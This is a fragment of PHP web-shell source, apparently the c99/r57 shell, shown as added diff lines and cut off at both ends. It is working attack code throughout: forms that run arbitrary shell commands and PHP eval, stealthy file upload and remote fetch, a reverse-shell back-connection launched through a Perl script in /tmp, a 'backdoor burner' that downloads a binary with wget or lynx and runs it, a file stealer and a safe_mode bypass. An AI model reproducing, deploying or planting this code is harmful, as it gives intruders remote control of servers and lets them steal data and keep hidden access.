checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> +Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> +Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +File-name (auto-fill): <input name=uploadfilename size=25><br><br> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> +<input type=submit name=submit value=\"Upload\"> +</form>"; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} + } + if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "<b>Result of execution this command</b>:<br>"; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + @chdir($olddir); + } + else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "<b>Name</b>"; + $row[] = "<b>Size</b>"; + $row[] = "<b>Modify</b>"; + if (!$win) + {$row[] = "<b>Owner/Group</b>";} + $row[] = "<b>Perms</b>"; + $row[] = "<b>Action</b>"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; + $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; + $row[$k] .= $y; + for($i=0;$i<count($row)-1;$i++) + { + if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + else + { + $type = "DIR"; + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; + if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} + else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} + if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} + else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgcolor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; + foreach($table as $row) + { + echo "<tr>\r\n"; + foreach($row as $v) {echo "<td>".$v."</td>\r\n";} + echo "</tr>\r\n"; + } + echo "</table><hr size=\"1\" noshade><p align=\"right\"> + <script> + function ls_setcheckboxall(status) + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = status; + id++; + } + } + function ls_reverse_all() + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; + id++; + } + } + </script> + <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> + <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + echo "<select name=act><option value=\"".$act."\">With selected:</option>"; + echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; + echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; + if ($usefsbuff) + { + echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; + echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; + echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; + } + echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; + echo "</form>"; + } +} +if ($act == "tools") +{ + + + + + + + ?> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Bind Functions By r57 </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center"> + </div> + <form action="<?php echo $surl; ?>"> +<b>Bind With Backd00r Burner</b></br><form action="<?php echo $surl;?>"><input type=hidden name=act value=tools><select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select></br></br><input type="submit" value="Burn it bAby"></form> + </td> + <td width="50%" height="83" valign="top"><center> + <center> + + + <b>Back-Connection :</b></br><form action="<?php echo $surl;?>"> <b>Ip (default is your ip) :</br> </b><input type=hidden name=act value=tools><input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"></br><b>Port:</br></b><input type="text" name="pipi" value="4392"></br><input type="submit" value="C0nnect ->"></br></form> +Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br> + + </center> + </td> +</tr></TABLE> + + + + + + + +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>File Stealer Function Ripped fRom Tontonq 's File Stealer ... </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center"><b>Safe_Mode Bypass</b> + <form action="<?php echo $surl; ?>" method="POST"> + <input type=hidden name=act value=tools> + <textarea name="erorr" cols=100 rows=10></textarea></br> + <input type="text" name="nere" value="<?echo "$real\index.php";?> "size=84> + <input type="submit" value="Write 2 File !!"> + + </form> + + + + + + + + + + + + </div> + + </td> + <td width="50%" height="83" valign="top"><center> + <center> + <form action="<?php echo $surl; ?>" method="POST"> + <input type=hidden name=act value=tools> + Dosyanin Adresi ? = <input type="text" name="dosyaa" size="81" maxlength=500 value=""><br><br> +Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo "$real/sploitz.zip"; ?>"><br><br> +<input type=submit class='stealthSubmit' Value='Dosyayi Chek'> +</form> +<br><br><br> + + + + + </center> + + </center> + </td> +</tr></TABLE> + + + + + + + + + + + + +<?php + +if (isset($_POST['dosyaa'])) +{ +dosyayicek($_POST['dosyaa'],$_POST['yeniyer']); + +} +if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"); +echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...</b>"; +} +if (!empty($_GET['dolma'])) +{ +$sayko=htmlspecialchars($_GET['dolma']); +if ($sayko == "wgetcan") +{ + +myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + + +} + +else if ($sayko =="freadcan") +{ +dosyayicek($adires,"sayko_bind"); +myshellexec("./sayko_bind"); +} + +else if ($sayko == "lynxcan") +{ +myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + +} + + + + + +} + +if (!empty($_POST['erorr'])) +{ + + + +error_log($_POST['erorr'], 3, "php://".$_POST['nere']); + + + +} + + + + + + + + + +} +if ($act == "processes") +{ + echo "<b>Processes:</b><br>"; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) +{ + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} + $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + $prcs[] = $line; + echo "</tr>"; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode("",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode("",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo "</tr>"; + } + } + } + $head[$k] = "<b>".$head[$k]."</b>".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; + foreach($tab as $i=>$k) + { + echo "<tr>"; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} + echo "</tr>"; + } + echo "</table>"; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "<b>Result of execution this PHP-code</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + } + else + { + if ($eval_txt) + { + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + eval($eval); + echo "</textarea>"; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} + else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), + array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), + array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), + array("Code","code"), + array("Session","phpsess"), + array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), + array("SDB","sdb"), + array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), + array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), + array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), + array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), + array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") + ); + echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} + elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} + else {echo " <a 